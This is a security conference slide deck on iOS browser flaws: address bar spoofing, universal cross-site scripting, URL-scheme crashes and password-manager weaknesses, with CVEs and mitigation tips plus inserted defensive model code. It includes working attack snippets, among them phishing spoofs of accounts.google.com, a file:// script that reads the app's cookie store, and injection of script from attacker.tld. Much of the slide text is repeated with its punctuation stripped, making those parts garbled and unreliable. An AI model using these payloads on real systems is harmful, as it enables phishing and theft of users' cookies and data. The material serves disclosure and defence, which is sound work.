bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
UIWebView & WKWebView

iOS 8 beta: WKWebView
• configuration.preferences
• configuration.userContentController
• navigationDelegate
• UIDelegate
• URL (KVO)
• hasOnlySecureContent (KVO)

Bolted-on by the browsers
• Address bar
• Multiple tabs
• Downloads
• Support for untrusted SSL certificates
• Autocomplete & password manager
• … and many more features (safety ratings, malware protection, cloud integration, …)

Testing
• Inspiration from the Browser Security Handbook
• Retesting previous Mobile Safari bugs
• "Black-box" testing from the web perspective, review of JavaScript code, a bit of reversing and debugging
• Cross-browser test cases: https://ios.browsr-tests.com

In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers

Mobile Browsers Security iOS
Address Bar Spoofing

Address bar spoofing
• Look-alike: IDN etc.
• URL tracking desynchronization

URL tracking desynchronization
• Navigate to untracked content
• Initiate navigation, interrupt, overwrite content
• Failed navigation
• Loading loop
• Lots of other methods (race conditions, history, …)
• Most of them known for over 10 years (IE, Netscape)
Address Bar Spoofing: Untracked Content
Replace the window content with content the address bar does not track. document.write and/or data: URIs are usually good candidates.
• w = window.open('https://accounts.google.com'); setTimeout(function(){ w.document.write(…) }, …)
• CVE-2013-5152: Mobile Safari Address Bar Spoofing, reported in iOS 5.1.1, fixed in iOS 7
Address Bar Spoofing: Init & Interrupt
Initialise the window with the target URL, then replace it with phishing content before it loads.
• w = window.open('https://accounts.google.com'); w.document.write(…)
Optionally fall back to the native window.open (browsers override it with their own JavaScript):
• delete window.open; w = window.open('https://accounts.google.com'); w.document.write(…)
• CVE-2013-6895 Kaspersky Safe Browser
• CVE-2013-6898 F-Secure Safe Browser
• CVE-2013-6897 Dolphin Browser
• … and 45% of tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)
Address Bar Spoofing: Failed Navigation
The incorrect URL often remains in the address bar after navigation errors:
• DNS NXDOMAIN, host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display the phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing the error alerts
Address Bar Spoofing: Loading loop
• The HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with a filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443'; setInterval(function(){ location = 'https://accounts.google.com:8443' }, …)

Title bar
The phishing page sets its title to the URL it impersonates, so the title bar reads like an address bar:
• <title>https://www.apple.com</title>

Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying the SSL lock makes sense only if there was an actual, successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
Address Bar Spoofing
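The address-bar tips above, as an added example that is not part of the original talk: a JavaScript model of the bookkeeping a UIWebView-based browser can do in its UIWebViewDelegate. The three delegate callbacks are the ones named on the slides; the class and function names, the `hasOnlySecureContent` flag passed into `finish()` (borrowed from the WKWebView property of that name), and the attacker/target hostnames are assumptions made for the example. The "naive" class reproduces what the spoofed browsers do, the second one the behaviour the tips ask for.

```javascript
// Added example (not from the talk): address-bar state driven by the
// UIWebViewDelegate callbacks named on the slides:
//   webView:shouldStartLoadWithRequest:navigationType: -> start()
//   webViewDidFinishLoad:                               -> finish()
//   webView:didFailLoadWithError:                       -> fail()
// Every spoof in this section relies on the bar showing a URL at navigation
// *attempt* and never being corrected afterwards.

// What many of the tested browsers do: show the requested URL (and a lock for
// https) as soon as the navigation starts, and leave it alone on failure.
class NaiveAddressBar {
  constructor(url) { this.shown = url; this.lock = url.startsWith('https://'); }
  start(url) { this.shown = url; this.lock = url.startsWith('https://'); }
  finish() {}
  fail() {}                                   // error alert, bar left untouched
  display() { return { url: this.shown, lock: this.lock }; }
}

// Hardened version: the bar reflects the document that is really in the web
// view (webView.request.mainDocumentURL), a pending navigation is only shown
// as "loading", and the lock requires a finished load over validated TLS for
// the document and all subresources (hasOnlySecureContent, assumption: the
// native side reports it).
class AddressBar {
  constructor(url) {
    this.committed = url;                     // document actually displayed
    this.committedSecure = false;             // nothing validated yet
    this.pending = null;                      // navigation attempt in flight
    this.error = null;
  }
  start(url) { this.pending = url; this.error = null; }
  finish(loadedUrl, hasOnlySecureContent) {
    this.committed = loadedUrl;               // read back from the web view
    this.committedSecure = loadedUrl.startsWith('https://') && hasOnlySecureContent === true;
    this.pending = null;
  }
  fail(error) {                               // NXDOMAIN, closed port, TLS error, timeout
    this.error = error;
    this.pending = null;                      // the old document is still on screen
  }
  display() {
    return { url: this.committed, lock: this.committedSecure,
             loading: this.pending !== null, error: this.error };
  }
}

// "Failed navigation" spoof: a phishing page on attacker.tld (constructed
// hostname) navigates to a URL that cannot load.
function failedNavigationSpoof(bar) {
  bar.start('https://login.target.tld/');     // no such host
  bar.fail('NXDOMAIN');
  return bar.display();
}

// "Loading loop" spoof: a request to a filtered port hangs for minutes while
// the attacker's page stays on screen; finish() never arrives.
function loadingLoopSpoof(bar) {
  bar.start('https://accounts.google.com:8443/');
  return bar.display();
}
```

Run the two spoofs against both classes: the naive bar shows `https://login.target.tld/` with a lock over attacker content, the hardened one keeps `http://attacker.tld/`, no lock, and an error or loading indicator.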
UXSS: Universal Cross-Site Scripting

XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website. (~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after the PDF UXSS in 2007.

• CVE-2013-6893 UXSS in Mercury Browser for iOS
• CVE-2013-7197 UXSS in Yandex.Browser for iOS
• CVE-2012-2899 UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser
How a cross-tab call travels through the JavaScript bridge:
w = window.open('about:blank')
  → mb.exec$(WINDOW_ID) [ command: window.open, target: 1234, url: about:blank ]   (target id taken from Math.random())
  → [webView loadRequest: … "about:blank" …]
  → cross-frame forgery: the target id is all that ties a call to a window
w.document.write('Hi')
  → mb.exec$(WINDOW_ID) [ command: window.document.write, target: 1234, html: Hi ]
  → [webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>');
… and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi')
  → [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
  about:blank is kind of "no URL", right?
  → [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the content in the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files.
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>') → shows the applewebdata:// origin
• UXSS + local file access (application sandbox; the whole filesystem on a jailbroken device)
Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
  → [webView loadHTMLString:@"Hi" baseURL:[NSURL … "about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
Other potential paths to the applewebdata or file origin
• baseURL: [NSURL URLWithString:@"http://example.com…"] → nil, and CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com…"), NULL) → NULL, for any string that is not a valid URL; a nil baseURL lands the content in applewebdata://
• Downloads opened directly from file://

Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+), but document.location.href and document.referrer still name the hosting site, which a hostname-based "same-origin" check in the bridge accepts:
  w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')
UXSS: Universal Cross-Site Scripting
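The cross-tab bugs in this section (Mercury's missing check, Yandex's check at window.open() that is not repeated at document.write(), Chrome's about:blank child ending up in applewebdata://, and the attachment case directly above) all come down to how the JavaScript-to-native bridge decides whose origin a tab has at the moment of the write. The following is an added example, not code from the talk or from any of the browsers named in it: a model of such a bridge with the two broken policies beside a version that recomputes both origins at every write, treats attachments, file: and applewebdata: documents as opaque, and gives an about:blank child its opener's origin (the same reasoning as the baseURL fix). Tab ids, hostnames and the bridge's method names are assumptions made for the example.

```javascript
// Added example (not from the talk): a tab bridge with three same-origin
// policies for w.document.write() across tabs.

// Effective origin of a tab. about:blank inherits the opener's origin (which
// is why a child opened on about:blank must get the opener's URL as baseURL,
// never nil). Attachments, file: and applewebdata: documents are opaque and
// match nothing, not even each other.
function effectiveOrigin(tab) {
  if (tab.opaque) return null;
  if (tab.url === 'about:blank') return tab.openerOrigin;
  let u;
  try { u = new URL(tab.url); } catch (e) { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return u.origin;
}

class TabBridge {
  // policy: 'none' | 'check-at-open' | 'check-at-write'
  constructor(policy) { this.policy = policy; this.tabs = new Map(); this.nextId = 1; }

  newTab(url, { openerOrigin = null, opaque = false } = {}) {
    const id = this.nextId++;
    this.tabs.set(id, { url, openerOrigin, opaque, writers: new Set(), html: '' });
    return id;
  }
  originOf(id) { return effectiveOrigin(this.tabs.get(id)); }

  // window.open(url) issued from tab `from`; returns the child's tab id
  open(from, url) {
    const opener = this.originOf(from);
    const child = this.newTab(url, { openerOrigin: opener });
    // 'check-at-open': decide once, here, and remember the verdict
    if (this.policy === 'check-at-open' && opener !== null && this.originOf(child) === opener) {
      this.tabs.get(child).writers.add(from);
    }
    return child;
  }

  // the child navigates, or is redirected, after it was opened
  navigate(id, url) { this.tabs.get(id).url = url; }

  // w.document.write(html) relayed from tab `from` into tab `target`
  documentWrite(from, target, html) {
    const t = this.tabs.get(target);
    if (!t) return false;
    let allowed;
    if (this.policy === 'none') {
      allowed = true;                              // no check at all
    } else if (this.policy === 'check-at-open') {
      allowed = t.writers.has(from);               // stale verdict from open()
    } else {
      const a = this.originOf(from), b = this.originOf(target);
      allowed = a !== null && a === b;             // current origins, every time
    }
    if (allowed) t.html = html;
    return allowed;
  }
}

// Attack from the slides: open about:blank (same origin as the opener),
// redirect the child to the victim, then write script into it.
function openRedirectWrite(policy) {
  const br = new TabBridge(policy);
  const attacker = br.newTab('http://attacker.tld/');
  const w = br.open(attacker, 'about:blank');
  br.navigate(w, 'https://accounts.google.com/');
  return br.documentWrite(attacker, w, '<script src="http://attacker.tld/x.js"></script>');
}

// Content-Disposition variant: an attachment downloaded from victim.tld keeps
// victim.tld in location.hostname but lives in an isolated origin; it opens
// 'https://' + location.hostname and tries to write into the real site.
function attachmentWrite(policy) {
  const br = new TabBridge(policy);
  const attachment = br.newTab('https://victim.tld/poc.html', { opaque: true });
  const w = br.open(attachment, 'https://victim.tld/');
  return br.documentWrite(attachment, w, '<script>/* custom SOP implementation */</script>');
}
```

`openRedirectWrite('none')` and `openRedirectWrite('check-at-open')` both return true, which is the UXSS; only `'check-at-write'` refuses, while still allowing a page to write into an about:blank child it opened itself.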
Content-Type
• text/plain → rendered as HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream → rendered as HTML
• application/other with a filename ending in .html → rendered as HTML

JS without Same-Origin Policy
From a file:// document, read the app's cookie store by rebuilding the sandbox path from the document's own URL:
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest();
  x.open('GET', path, false);
  x.send();
  alert(x.responseText);
}
</script>

Or read from the intranet:
<script>
x = new XMLHttpRequest();
x.open('GET', 'https://yourintranet', false);
x.send();
alert(x.responseText);
</script>

Challenge: hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
UXSS: Universal Cross-Site Scripting
Popups & URL handling

Popup blockers
• Browsers that rewrite href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…

URI schemes
• Native (WebKit)
• Application (bolted-on)
• Bridge (internal): scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html, scheme://add-filter?url=…
• Registered (external)

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a null pointer dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
Popups & URL handling
Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-002 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
Popups & URL handling
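The popup-blocker bypass and the CFURL null pointer dereference above are two sides of the same missing step: a URL produced by web content is handed to native code or to the system without a decision being made about it first. The following is an added example, not code from the talk or from any of the browsers: the checks a browser's navigation policy can apply in one place. Anything that is not http(s) or about:blank needs a user gesture (an iframe src or a script-set location is not one), the browser's own bridge scheme is never accepted from web content, and a string that fails URL parsing is rejected instead of becoming a NULL CFURL. The internal scheme name `scheme:` is the placeholder used on the slides; the sample URLs are the ones from this section plus constructed variants.

```javascript
// Added example (not from the talk): navigation policy applied before a URL
// reaches native code. `userGesture` and `fromWebContent` are assumed to be
// supplied by the browser (UIWebViewDelegate navigationType, or whether the
// request came from the UI rather than from page content).

const INTERNAL_BRIDGE_SCHEMES = new Set(['scheme:']);   // placeholder from the slides

// Forbidden host code points (WHATWG URL); a second line of defence in case
// the platform parser is more lenient than expected.
const FORBIDDEN_HOST_CHARS = /[\u0000-\u0020#%\/:<>?@\[\\\]^|]/;

function decideNavigation({ url, userGesture = false, fromWebContent = true }) {
  // '%' not followed by two hex digits: NSURL/CFURL give nil/NULL for such
  // strings, and the bridge would then pass NULL into CFURLCopyPath() & co.
  if (/%(?![0-9A-Fa-f]{2})/.test(url)) {
    return { action: 'block', reason: 'malformed percent-encoding' };
  }
  let parsed;
  try {
    parsed = new URL(url);
  } catch (e) {
    return { action: 'block', reason: 'unparsable URL' };
  }
  if (FORBIDDEN_HOST_CHARS.test(decodeURIComponent(parsed.hostname))) {
    return { action: 'block', reason: 'forbidden character in host' };
  }
  if (INTERNAL_BRIDGE_SCHEMES.has(parsed.protocol)) {
    return fromWebContent
      ? { action: 'block', reason: 'internal bridge scheme from web content' }
      : { action: 'bridge', url: parsed.href };
  }
  if (parsed.protocol === 'http:' || parsed.protocol === 'https:' || parsed.href === 'about:blank') {
    return { action: 'load', url: parsed.href };
  }
  if (!userGesture) {
    return { action: 'block', reason: 'external scheme without user gesture' };
  }
  return { action: 'confirm', url: parsed.href };   // ask before handing off to the system
}

// Constructed sample: navigations an attacker page can trigger without a click.
const SAMPLE_URLS = [
  'https://accounts.google.com/',
  'googlechrome://example.com',
  'merc://example.com',
  'scheme://download/http://attacker.tld/README.html',
  'scheme://add-filter?url=',
  'http://%',
  'http://%5',
  'http://%5c',
];

function triageAll(urls = SAMPLE_URLS) {
  return urls.map(u => [u, decideNavigation({ url: u }).action]);
}
```

Run over `SAMPLE_URLS`, only the https URL is loaded; the app schemes and the bridge commands are blocked for lack of a user gesture or because they are internal, and the three percent-encoding cases never reach native code.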
SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14% of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only, not for subresources (e.g. Opera Coast < 3.02)

Password managers
• JavaScript runs with the privileges of the top frame → passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with or without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
SSL & password managers
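The password-manager points above, as an added example that is not part of the original talk and not taken from any of the tested browsers: a save-and-fill policy for a bolted-on password manager. Entries are keyed by full origin (scheme, host and port) rather than by domain, so a credential saved on https://login.example.com is not filled into http://login.example.com; nothing is filled into a subframe, matching the top-frame-only privilege of the injected JavaScript; and a save is accepted only for the origin of the top document that actually submitted the form, taken from the web view rather than from the page, so content cannot force a credential to be stored for another domain. `domainOnlyLookup` is the weaker matching the slides describe, kept for contrast. The bridge method names, the `fromTopFrame` flag and the hosts and credentials are constructed for the example.

```javascript
// Added example (not from the talk): password store keyed by origin, with
// save/fill rules for a JavaScript-to-native password manager bridge.

function originOf(url) {
  try { return new URL(url).origin; } catch (e) { return null; }
}

class PasswordStore {
  constructor() { this.entries = new Map(); }   // origin -> { user, pass }

  // pageUrl is what the web view reports as its main document URL (trusted),
  // never a "domain" parameter the page passed into the bridge.
  save({ pageUrl, formActionUrl, user, pass, fromTopFrame }) {
    const origin = originOf(pageUrl);
    if (!fromTopFrame || origin === null) return false;
    if (originOf(formActionUrl) !== origin) return false;  // posts elsewhere: not this site's credential
    this.entries.set(origin, { user, pass });
    return true;
  }

  fill({ pageUrl, fromTopFrame }) {
    if (!fromTopFrame) return null;                          // subframes never get passwords
    const origin = originOf(pageUrl);
    return origin === null ? null : (this.entries.get(origin) || null);
  }
}

// Domain-only matching: https:// and http:// collapse to the same key, so a
// network attacker serving http://login.example.com gets the https credential.
function domainOnlyLookup(store, pageUrl) {
  let host;
  try { host = new URL(pageUrl).hostname; } catch (e) { return null; }
  for (const [origin, cred] of store.entries) {
    if (new URL(origin).hostname === host) return cred;
  }
  return null;
}
```

Save a credential on https://login.example.com and ask for it from http://login.example.com: `fill()` returns nothing, `domainOnlyLookup()` hands it over in clear text.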
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?

References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec
• http://www.w3.org/TR/CSP
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews
• http://www.shmoo.com/idn
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com
• https://ios.browsr-tests.com

Questions?

lukaszpilorz@runic.pl, pawelwylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
